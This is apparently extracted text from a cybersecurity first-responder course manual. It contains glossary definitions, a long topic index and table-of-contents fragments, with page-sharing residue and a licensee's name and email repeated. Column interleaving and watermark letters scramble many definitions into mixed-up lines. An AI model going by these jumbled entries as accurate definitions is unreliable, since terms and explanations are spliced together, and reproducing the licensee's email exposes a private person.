organization's financial and business published by the American Institute of
ut
operations. Certified Public Accountants (AICPA) that
focuses on financial reporting.
spam
ib
An email-based threat that floods the user's SSH
inbox with emails that typically carry (Secure Shell) A protocol for secure remote
tr
unsolicited advertising material for products or logon and secure transfer of data.
other spurious content, and which sometimes
is
deliver malware. It can also be used with social SSL/TLS
networking sites such as Facebook and (Secure Sockets Layer/Transport Layer
D
Twitter. Security) A security protocol that uses
certificates and public key cryptography for
SPAN mutual authentication and data encryption over
(switch port analyzer) An approach to
or
capturing network data in which a network
appliance copies incoming and outgoing traffic
to a separate port on the appliance, which is
a TCP/IP connection.
SSO
(single sign-on) An authentication mechanism
e
then forwarded to another device for analysis. that provides users with one-time
at
authentication to multiple resources, servers, or

spear phishing sites.
An email-based or web-based form of phishing
lic
that targets specific individuals. Standard of Good Practice for

Information Security
spim A standard published by the ISF that focuses
up
A spam attack that is propagated through on helping businesses understand and address
instant messaging rather than email. evolving security issues in the subject areas of
compliance, threats, and risk management.
D
spoofing
A software-based attack where the goal is to steganography
assume the identity of a user, process, address, A security technique that hides a secret
ot
or other unique identifier. message by enclosing it in an ordinary file.
spyware stored attack

N
Surreptitiously installed malicious software that A cross-site scripting (XSS) attack in which an
is intended to track and report the usage of a attacker injects malicious code or links into a
o
target system or collect other data the author website's forums, databases, or other data.
wishes to obtain.
D
STRIDE
SQL (spoofing, tampering, repudiation, information
(Structured Query Language) A language that disclosure, denial of service, and elevation of
applications use to interact with a database to privilege) An acronym used to classify threats.
perform four basic functions: selecting,
inserting, deleting, and updating data in the
database.
Glossary
supply chain attack threat profile

An attack that targets the end-to-end process A comprehensive list of a threat's
of manufacturing, distributing, and handling characteristics, including skill, motive,
goods and services. intentions, and vectors.
system hardening Tigerscheme

The process by which a host or other device is A commercial certification scheme for
made more secure through the reduction of technical security specialists, managed by the
that device's attack surface. University of South Wales Commercial
e
Services.
ut
tabletop exercise
A discussion of simulated emergency situations traffic analysis
and security incidents. See packet trace analysis.
ib
tailgating transport encryption
tr
A human-based attack where the attacker slips The technique of encrypting data that is in
in through a secure area following an unaware transit, usually over a network like the Internet.
is
legitimate employee.
trend analysis
TAP The process of detecting patterns within a
D
(test access point) A device that captures dataset over time, and using those patterns to
network data that flows between network make predictions about future events or to
appliances, then forwards that data along
separate ports to another device for analysis.
TCPED
or
better understand past events.
Trojan horse
A type of malware that hides itself on an
e
(tasking, collection, processing, exploitation, infected system and can cause damage to a
at
and dissemination) The five primary phases of system or give an attacker a platform for
the threat intelligence lifecycle. monitoring and/or controlling a system.
lic
technical controls TTP

Hardware or software installations that are (tactics, techniques, and procedures) The three
implemented to monitor and prevent threats main variable factors that make up a threat.
up
and attacks to computer systems and services.

typo squatting
threat actor See URL hijacking.
D
An attacker. Typically used to denote that an

attacker is of a certain type. UDDI
(Universal Description, Discovery, and
ot
threat hunting Integration) An open XML-based protocol

The technique in which a team of security that enables web service devices to register,
personnel will actively "hunt" for indicators of find, and interact with each other on the
N
compromise in a particular environment. Internet.
threat intelligence UDP flood

o
The process of addressing information about (User Datagram Protocol) An attack in which
D
emerging threats and threat sources. an attacker attempts to overwhelm the target
system with UDP ping requests.
threat modeling
The process of identifying and assessing the update management
possible attack vectors that target systems. See patch management.
Glossary
URL hijacking vulnerability scan

An attack that exploits user errors in typing by A scan that various tools and security utilities
registering malicious websites with common use to identify and quantify vulnerabilities
misspellings of legitimate words and websites. within a system, such as lacking security
controls and common misconfigurations, but
US-CERT does not directly test the security features of
(United States Computer Emergency Readiness that system.
Team) A government organization that
analyzes and distributes information about WAF
e
threats to cybersecurity. (web application firewall) A type of firewall
ut
that controls web-based application-layer
vertical privilege escalation traffic in the network.
An attack in which an attacker can perform
ib
functions that are normally assigned to users in war driving
higher roles, and often explicitly denied to the The act of searching for a wireless network
tr
attacker. signal while in a moving vehicle.
is
virtualization web service
The process of creating a simulation of a Any software that provides network
D
computing environment, where the virtualized communication between devices.
system can simulate the hardware, operating
system, and applications of a typical computer whaling
virus
or
without being a separate physical computer.
A malicious piece of code that spreads from

An email-based or web-based form of phishing
that targets particularly wealthy individuals.
white box
e
one computer to another by attaching itself to A pen test approach that simulates an inside
at
other files through a process of replication. attacker that knows everything about the
target. The pen tester does not need to
vishing perform their own reconnaissance, as this is
lic
A human-based attack where the attacker provided for them.

extracts information while speaking over the
phone or leveraging IP-based voice messaging whitelisting
up
services (VoIP). The process of allowing specific systems,

software, services, and so on, to use a resource.
VM escape Anything not on the list is blocked.
D
An exploit where an attacker executes code in

a VM that enables an application running on Windows PowerShell
the VM to "escape" the virtual environment A command shell and scripting language built
ot
and interact directly with the hypervisor. on the .NET Framework.
vulnerability assessment WMIC

N
An evaluation of a system's security and ability (Windows Management Instrumentation

to meet compliance requirements based on the Command-line) A tool that provides an
o
configuration state of the system, as interface into Windows Management

represented by information collected from the Instrumentation (WMI) for local or remote
D
system. management of computers.
vulnerability management worm

The methodical process of discovering, Malware that replicates itself across the
analyzing, and controlling every vulnerability infected system, but does not attach itself to
associated with unacceptable risks. other programs or files.
Glossary
WPS
(Wi-Fi Protected Setup) An insecure feature of
WPA and WPA2 that enables enrollment in a
wireless network based on an 8-digit PIN.
WSDL
(Web Services Description Language) An
XML-based protocol for transmitting and
receiving information used in web applications
e
to a variety of device types.
ut
XSRF
(cross-site request forgery) A web application
ib
attack where an attacker takes advantage of the
trust established between an authorized user of
tr
a website and the website itself.
is
XSS
(cross-site scripting) A web application attack
D
where the attacker takes advantage of scripting
and input validation vulnerabilities in an
interactive website to attack legitimate users.
Z shell
An updated version of the Bash shell that has
various improvements to the shell but the
or
e
same basic syntax as Bash.
at
zombie
See bot.
lic
up
D
ot
N
o
D
Glossary
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

Index
e
ut
ib
tr
A targets 131
technique criteria 61
is
AAR
trees 81
important questions 403
vectors 61
overview 402
D
attack surface
account management 43
defined 122
Active Directory analysis tools 351
mapping 261
active fingerprinting 242
administrative controls 26
or
Address Resolution Protocol, See ARP
advanced persistent threats, See APTs

scanning 261
auditing
asset identification 221
e
compliance audit 220
Adversarial Tactics, Techniques, and
objectives 219
at
Common Knowledge, See ATT&CK

overview 218
adware
policies and procedures 219
techniques 145
lic
results communication 223

after-action report, See AAR
results documentation 222
ALE 20
tools 222
analysis methods 281
up
authorization 112
annual loss expectancy, See ALE
availability 18
annual rate of occurrence, See ARO
anomaly analysis 282
B
D
anti-forensics 209
application logs 304 backdoors 188
APTs
ot
baiting 110
overview 187 base metrics 27
armored viruses 144 Bash 322
N
ARO 19 bastion host 411

ARP BCP 392
poisoning 152 beaconing 180
o
spoofing 152 behavioral analysis 282

D
ATT&CK 212 BIA 46

attack big data
evasion techniques, for DoS 163 overview 174
networks and systems 87 threats 174
passwords 262 bit-stream imaging 445
simulated 262 black box test 256

black hole routing 414 command and control, See C&C

blacklisting 412 command injection 132
Bluetooth 366, 410 Common Attack Pattern Enumeration and
botnets 162, 163 Classification, See CAPEC
BPA 46 Common Vulnerabilities and Exposures,
bricking 162 See CVE
bring your own device, See BYOD Common Vulnerability Scoring System, See
buffer overflow 161, 210 CVSS
e
business continuity plan, See BCP Common Weakness Enumeration, See
business impact analysis, See BIA CWE
ut
business partnership agreement, See BPA communication
BYOD within CSIRT 397
ib
threats 169 with third parties 436
trends in mobile security 168 Communications-Electronics Security
Group, See CESG
tr
C compensating control 44
compromised system analysis 445
is
C&C 180, 182 Computer Fraud and Abuse Act, See
CAM CFAA
D
overview 287 Computer Misuse Act 13
tables 287 confidentiality 18
CAN-SPAM 15 confidentiality, integrity, and availability,
CAPEC 29
CBEST 254
CDM 274
or See CIA
confidentiality, integrity, and availability
triad, See CIA triad
e
Center for Internet Security, See CIS configuration files 286
CESG 254
at
configuration management 279

CFAA 460 containment and mitigation tools 416
chain of custody 435 content-addressable memory, See CAM
lic
change management 276 Continuous Diagnostics and Mitigation, See

CHECK 254 CDM
Children's Online Privacy Protection Act, continuous security monitoring, See CSM
up
See COPPA Controlling the Assault of Non-Solicited

CIA 18 Pornography and Marketing, See CAN-
CIA triad SPAM
D
overview 24 Control Objectives for Information and

technical controls 26 Related Technology, See COBIT
cipher 244 cookies
ot
CIS 11 hijacking 135

classification of information 23 poisoning 135
clickjacking 135
N
COPPA 15
client-side attacks 131 correlation analysis 282
closed source intelligence 86 Council for Registered Ethical Security
o
cloud infrastructure Testers, See CREST

challenges 173 covert channels 202
D
hacking tools 175 CREST 254

cloud provider logs 292 cross-site request forgery, See XSRF
Cloud Security Alliance, See CSA cross-site scripting, See XSS
CMMC 13 cryptography 244
COBIT 11 CSA 12
code injection 132 CSIRT
coercive parsing 136
Index
communication 397 directory traversal 134

communication with forensic analyst 425 disassembler 350
day in the life 396 disaster recover plan, See DRP
documentation 397 distributed denial of service attack, See DDoS
external 395 attack
organization 394 DNS
CSM 274 amplification attack 162
CSRF, See XSRF as C&C channel 181
e
cut command 318 as target 88
CVE 28 event logs 305
ut
CVSS 27 filtering 413
CWE 29 hijacking attack 154
ib
cyber attack anatomy 78 poisoning attack 153
cybercriminals 55 documentation
Cyber Kill Chain 78, 79 incident response 392
tr
cyberlaw 460 investigation results 461
cybersecurity security-related 45
is
defined 2 within CSIRT 397
elements 2 Document Object Model attacks, See DOM-
D
incident response team, See CSIRT based attacks
standards and frameworks 10 Domain Name System, See DNS
threat motives 56 DOM-based attacks 131
Cybersecurity Model Maturity Certification, See
CMMC
cyberterrorism 56
DoS
or
attack 161
attack techniques 161
e
cyberterrorists 56 evasion techniques 163
at
tools 164
D doxing 59
drive usage
lic
data tools 363

big 174 drones 162
collection 276 DRP 393
up
exfiltration 202 dumpster diving 86, 111

extraction 444 Dynamic Host Configuration Protocol
mining 260 spoofing, See DHCP spoofing
D
preservation 444
remanence 174
remnants 174 E
ot
retention 281 eavesdropping 257

data analytics 70 EDR 69, 291
Data Encryption Standard, See DES endpoint detection and response, See EDR
N
Data Protection Act 15 Endpoint detection and response systems, See

DDoS attack 162 EDR
o
deep learning 69 endpoint security 416

defense in depth 32 enumeration
D
degaussing 415 methods 88

denial of service attack, See DoS overview 86
de-perimeterization 16 packet manipulation 261
DES 243 environmental metrics 27
DHCP spoofing 154 ETL 70
diff command 319 evasion techniques
digital signatures 26 for DoS 163
Index
for reconnaissance 90 G
Event Viewer 321
GAPP 14
evidence authentication 435
GDPR 16
evil twin 380
General Data Protection Regulation, See
excessive bandwidth usage 378
GDPR
exploits
Generally Accepted Privacy Principles, See
current landscape 69
GAPP
web services 136
geo-velocity 381
e
expressions
GHDB 261
building 475
ut
GLBA 15
regular 472
golden tickets 193, 209
extract, transform, and load, See ETL
Google Hacking Database, See GHDB
ib
Gramm–Leach–Bliley Act, See GLBA
F grep command 317
tr
Federal Information Security Management Act, grey box test 256
See FISMA
is
file H
carving 444
hacktivists 55
D
inclusion 134
hashing 26
inclusion, local 135
Health Insurance Portability and
inclusion, remote 134
sharing services 203
systems 443
file system analysis tools 345, 362
or Accountability Act, See HIPAA
heuristic analysis 282
hijacking
cookie 135
e
find command 320
DNS 114, 154
findstr command 320
at
session 152, 155

fingerprinting
tools 155
defined 242
URL 111
lic
firewalls
HIPAA 15, 17
as security controls 25
hoax 109
logs 288
honeypot 411
up
mitigation 416
horizontal privilege escalation 125
FISMA 13
HTTP/S 181
flash crowds 293
HTTP logs 307
D
footprinting
methods 86
overview 86 I
ot
forensic analysts IA 46
CSIRT communication 425 IAM
day in the life 430
N
overview 407
duties 425 ICMP
forensics as C&C channel 182
o
analysis 445 ICMP flood attack 161

data preservation 444 identity and access management, See IAM
D
investigation models 431 identity theft 55

investigation preparation 433 IDS 79
forensic toolkit IDS/IPS
open source software 436 attack mitigation 416
physical 438 logs 290
proprietary software 437 solutions 291
FTP logs 308
Index
impersonation 109, 152 jump box 410

incidents
containment 400 K
countermeasure 407
evaluation and analysis 399 Kali Linux 259
handling 392
handling tools 403 L
identification 398 lateral movement 191
e
impact 399 law enforcement liaisons 461
indicator sources 398 least privilege 41
ut
internal and external communication 397 lessons learned report, See LLR
mitigation 417 levels of authority 31
ib
mitigation and eradication 401 LFI 135
post-incident phase 402 LLR 402
recovery 401
tr
local file inclusion, See LFI
response 41, 393 log analysis tools 316, 324
scope 399
is
logical controls 25
indicators of compromise, See IOCs logic bomb
information processing techniques 189
D
overview 277 logs
Information Security Forum, See ISF application 304
Information Technology Assurance
Framework, See ITAF
inherent risk 31
input validation 131
or
auditing 278
cloud provider 292
DNS 305
enrichment 277
e
integrity 18 Event Viewer 321
at
interconnection security agreement, See ISA firewall 288

interference 288 FTP 308
International Organization for Standardization, HTTP 307
lic
See ISO IDS/IPS 290

Internet Relay Chat, See IRC network traffic 293
interoperability agreement, See IA operating system 302
up
intrusion detection system, See IDS proxy 292

intrusion prevention system, See IPS SMTP 306
investigation scope 433 SQL 309
D
IOCs 372, 381, 398 SSH 308

IPS 30 switch and router 287
IRC 181 tuning 295
ot
ISA 46 WAF 289

ISA/IEC-62443 12 Windows event 302
N
ISACA 11, 66 wireless device 288

ISF 11 long tail analysis 325
ISO
o
compliance 17
ISO/IEC 27000 series 11, 14
M
D
ISO/IEC 29100 14 machine learning 69

isolation 410 malvertisement 143
ITAF 11 malware
categories 143
J tools 148
management controls 26
job rotation 41
Index
mandatory vacation 41 O
man-in-the-middle attack 154
OLA 46
masked attacks 125
open source intelligence 86
master service agreement, See MSA
Open Source Security Testing Methodology
MDM 408
Manual, See OSSTMM
memorandum of understanding, See MOU
Open Vulnerability and Assessment Language,
memory analysis tools 350, 365
See OVAL
memory leaks 244
Open Web Application Security Project, See
e
memory residents 210
OWASP
message digest 26
ut
operating-level agreement, See OLA
metric groups 27
operating system logs 302
MITRE Corporation 28
operational controls 26
ib
mobile
order of volatility 443
infrastructure hacking tools 170
OSSTMM 254
security trends 168
tr
OVAL 279
mobile device management, See MDM
OWASP 12, 254
mobile platform
is
threats 169
modifiers 475 P
D
MOU 46 packet
MSA 45 crafting 262
N
NAC 418
or generators 162
manipulation 261
trace analysis 91
parameterized queries 134
e
National Institute of Standards and
passive fingerprinting 242
Technology, See NIST
at
pass the hash 192

National Vulnerability Database, See NVD
passwords
NBAD 276
attacks 262
lic
NDA 46
cracking 124
NERC 1300 12
sniffing 123
NetFlow 276
storage 125
up
network access control, See NAC

patch management 408
network analysis tools 352, 366
Payment Card Industry Data Security Standard,
network-based intrusion detection system, See
See PCI DSS
D
NIDS
PCI DSS
network behavior anomaly detection, See
definition of 16
NBAD
penetration test
ot
network sniffing 258

phases 255
Network Time Protocol, See NTP
penetration testing
next-generation firewall, See NGFW
N
categories 257
NGFW 289
external 256
NIDS 90
fingerprinting 242
o
NIST
follow-up 263
800 Series Special Publications (SP) 10
D
framework 254
overview 10
internal 256
Privacy Framework 14
overview 238
non-disclosure agreement, See NDA
phases 254
normalization 275, 277
scope 256
NTP reflected attack 162
teams 254
NVD 29
techniques 257
Index
third-party 254 quid pro quo 109

tools 258
vs. vulnerability assessment 239 R
Penetration Testing Execution Standard, See
PTES rainbow tables 124, 262
permanent DoS attack 162 ransomware 69, 143
Personal Information Protection and ransomware techniques
Electronic Documents Act, See PIPEDA payloads 146
payment 147
e
pharming 110
phishing 110, 112, 113, 375 vectors and warnings 145
ut
phlashing 162 reconnaissance
physical controls 25 evasion techniques 90
processes 86
ib
physical evidence storage 444
physical security 409 social engineering in 114
piggybacking 112 tools 90
tr
ping flood attack 161 variables 89
PIPEDA 15 recreational hackers 55
is
pivoting reflected
changing routing tables 198 attacks 131
D
overview 196 DoS attack 162
SSH 197 regex 472
VPN 196 regexp 472
policies
life cycle 38
polymorphic viruses 144
or
Registry compromise 376
Registry Editor 344
regular expressions 472
e
port forwarding 196 remote access services 193
remote file inclusion, See RFI
at
port scanners 240, 241

prepared statements, See parameterized queries reports
preparing for log analysis 316 documentation 461
lic
private key 193 residual risk 31

privilege resource exhaustion 162
elevation 174 response planning 392
up
privilege elevation 125 reverse engineering 350

privilege escalation 125, 174, 381 RFC 2196 11
procedures RFI 134
D
lifecycle 39 risk
processes 346, 363 acceptance 30
Process Explorer 346 avoidance 30
ot
Process Monitor 347 continuous monitoring and improvement

professional hackers 55 31
determination 19
N
program packers 210

proxy logs 292 equation 3
PsExec 195 exposure 5
o
PTES 254 mitigation 30

public key 146 transference 30
D
publicly available information 278 risk analysis

methods 5
risk types 6
Q system-specific 18
qualitative analysis 5 risk assessment
quality control 32 documenting results of 20
quantitative analysis 5 influences 17
Index
risk management Security Content Automation Protocol, See

best practices 40 SCAP
business documentation 45 security controls 25
determining 4 Security Development Lifecycle, See SDL
process 3, 4 Security Device Event Exchange, See SDEE
process and procedure development 37 security information and event management,
Risk Management Framework, See RMF See SIEM
risk mitigation security intelligence
e
aggregate CIA scores 27 collection and reporting automation 281
classes of information 23 collection challenges 272
ut
response techniques 30 collection lifecycle 273
RMF 11 collection plan 274
ib
ROE 253 correlation 332
rogue access point 380 overview 272
rogue accounts 189 sources 276
tr
rogue hardware 380 security operations center, See SOC
root cause analysis 403 semi-quantitative analysis 6
is
rootkits separation of duties 41
techniques 187 server-side attacks 131
D
rules of engagement, See ROE service disruption 379
service-level agreement, See SLA
S session
salt 124
sandboxing 350
or fixation 135
hijacking 152, 155
prediction 135
e
sanitization 415 session analysis tools 365
Sarbanes–Oxley Act, See SOX Act
at
shoulder surfing 111

scanning SIEM
defined 86 analysis 332
lic
tools 246 data collection 281

SCAP 246 overview 332
script kiddies 54 tools 333
up
SDEE 290 Simple Mail Transfer Protocol, See SMTP

SDL 82 Simple Object Access Protocol, See SOAP
SDLC 11 single loss expectancy, See SLE
D
SDN 293 single sign-on, See SSO

search operators 472 sinkhole 418
search types 476 site books 393
ot
Secure Shell, See SSH SLA 46

Secure Sockets Layer/Transport Layer Slashdot effect 163
Security, See SSL/TLS
N
SLE 19
security SMiShing 110
best practices 40 SMTP 306
o
documentation topics 40 Smurf attack 161

incident response 443 sniffing passwords 123
D
information standards 280 SOA 45

items monitored 275 SOAP 136
monitoring tools 275 SOC 394
policy types 43 social engineering
procedure types 43 for pen testing 258
technologies 69 for reconnaissance 114
vulnerabilities 61, 68
Index
for systems hacking 126 BYOD 169

overview 108 categories 83
types 108 common targets 67
software-defined networking, See SDN current landscape 69
SOX Act 13 intentions 58
spam 111, 375 mobile platforms 169
spear phishing 110 motives 56
special operators 474 non-repudiation 174
e
spim 111 targets 59
spoofing TCPED 71
ut
IOCs 376 threat actors 54
overview 152 threat profile 62
ib
tools 155 types 78
spyware virtualized environments 173
techniques 145 wireless 168
tr
SQL threat hunting 372
injection attack 132 threat intelligence 71
is
logs 309 threat modeling
SSAE 18 12 approaches 80
D
SSH overview 80
logs 308 tools 82
pivoting 197 Tigerscheme 255
tunnels 123
SSL/TLS 17
SSO 192
tools or
timelines 434
Active Directory analysis 351

e
state data 287 cloud infrastructure hacking 175
at
statement of applicability, See SOA containment and mitigation 416

steganography 203 DoS 164
stored attacks 131 drive usage 363
lic
STRIDE 81 file system analysis 345, 362

Structured Query Language, See SQL hijacking 155
supply chain attacks 147 incident handling 403
up
switch and router logs 287 malware 148

syslog data 303 mobile infrastructure hacking 170
system hacking network analysis 352, 366
D
overview 122 penetration testing 258

tools 126 process analysis 346, 363
system hardening 410 RAM analysis 350, 365
ot
systems development life cycle, See SDLC reconnaissance 90

security monitoring 275
N
T services analysis 348

session analysis 365
tabletop exercises 396 SIEM 333
o
tactics, techniques, and procedures, See TTP spoofing 155

tailgating 111 system hacking 126
D
TCPED architecture 72 threat modeling 82

technical controls 25 vulnerability assessment testing 240
technical experts 461 vulnerability scanning 231, 246
technology evolution 69 traffic analysis 91
temporal metrics 27 transport encryption 378
threat trend analysis 281
big data 174
Index
trends vs. penetration testing 239

reports and documentation 71 vulnerability assessments
Trojan horse implementation 239
techniques 144 testing tools 240
TTP 78 vulnerability management
typo squatting 111 documentation 234
execution and report generation 231
U ongoing scanning 234
e
overview 230
UDDI 136 plans of action 232
ut
UDP flood 161 process 230
unauthorized account usage 381 remediation 233
unauthorized software 373
ib
remediation inhibitors 233
United States Computer Emergency Readiness requirements identification 231
Team, See US-CERT scanning frequency 234
tr
Universal Description, Discovery, and
Integration, See UDDI
W
is
unknown ports 377
unknown protocols 377 WAF
D
update management 408 logs 289
US-CERT 279 solutions 290
WAP 380
V
verification 32
vertical privilege escalation 125
or war driving 88, 257
web application firewall, See WAF
web services 136
e
Web Services Description Language, See
virtualization 173 WSDL
at
virtualized environment threats 173 website defacement 379

virtual machine, See VM targeting whaling 110
viruses
lic
white box test 256

techniques 144 whitelisting 412
vishing 110 Wi-Fi Protected Setup, See WPS
VM
up
Windows event logs 302

escape 173 Windows Management Instrumentation
live migration 174 Command-line, See WMIC
malware detection 211
D
Windows PowerShell 323

targeting 173 wireless access point, See WAP
volatile data collection 443 wireless device logs 288
VPN pivoting 196
ot
wireless threats 168

vulnerabilities WMIC 194, 321
virtual infrastructure 244 worms
N
vulnerability techniques 144

applications 244 WPS 242
devices 243
o
WSDL 136
information sources 245
D
of network infrastructure 242

report analysis 247 X
results validation 247 XSRF 131
scan 245 XSS 131
scanning tools 246
vulnerability assessment
overview 238
Index
Z
zombies 162
Z shell 323
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
Index
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
CNX0013S rev 1.0

ISBN-13 978-1-4246-4098-0
ISBN-10 1-4246-4098-9

CFR 410 PDF

Uploaded by

Copyright:

Available Formats

CFR 410 PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CFR 410 PDF

Uploaded by

Copyright:

Available Formats

e

Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M

Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M

Topic D: Integrate Documentation into Risk Management.............37

Lesson 2: Analyzing the Threat Landscape....................53

Topic A: Classify Threats.............................................................. 54

Lesson 3: Analyzing Reconnaissance Threats to

Computing and Network Environments.................. 77

Topic A: Implement Threat Modeling............................................ 78

Topic C: Assess the Impact of Social Engineering........................108

Lesson 4: Analyzing Attacks on Computing and

Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M

Topic A: Assess the Impact of System Hacking Attacks......................... 122

Topic A: Implement Cybersecurity Auditing.......................................... 218

Topic C: Assess Vulnerabilities............................................................. 238

Lesson 7: Collecting Cybersecurity Intelligence...................271

Topic C: Collect Data from Host-Based Intelligence Sources................. 302

Lesson 8: Analyzing Log Data............................................. 315

Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M

Lesson 9: Performing Active Asset and Network Analysis.... 343

Appendix A: Mapping Course Content to CyberSec First Responder®

Appendix B: Regular Expressions........................................................ 471

Topic A: Parse Log Files with Regular Expressions................................ 472

Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M

• CSSP Incident Responder

Model Certification (CMMC) domains:

• Audit and Accountability (AU)

Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M

systems in a cybersecurity context, including protection, detection, analysis, investigation, and

• Analyze the threat landscape.

• Analyze various post-attack techniques.

• Collect cybersecurity intelligence from various network-based and host-based sources.

• Respond to cybersecurity incidents using containment, mitigation, and recovery tactics.

The CHOICE Home Screen

which this course manual is only one part.

| About This Course |

How to Use This Book

reference and reflection to facilitate understanding and practice.

you're back on the job and need to refresh your understanding.

| About This Course |

| About This Course |

In this lesson, you will:

• Assess risks that affect the organization.

• Integrate documentation into risk management.

Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M

anything outside the

Figure 1-1: Elements of cybersecurity.

Cybersecurity refers to the protection of personal or organizational information or information

Asset Anything of value that could be compromised, stolen, or harmed,

Lesson 1: Assessing Cybersecurity Risk | Topic A

Risk = Threats × Vulnerabilities × Consequences

are only an example.

Figure 1-2: The risk equation.

Lesson 1: Assessing Cybersecurity Risk | Topic A

The Risk Management

represent the cycle of

Figure 1-3: One way to represent the cycle of risk management.

Lesson 1: Assessing Cybersecurity Risk | Topic A

Qualitative analysis is generally scenario based. A weakness of qualitative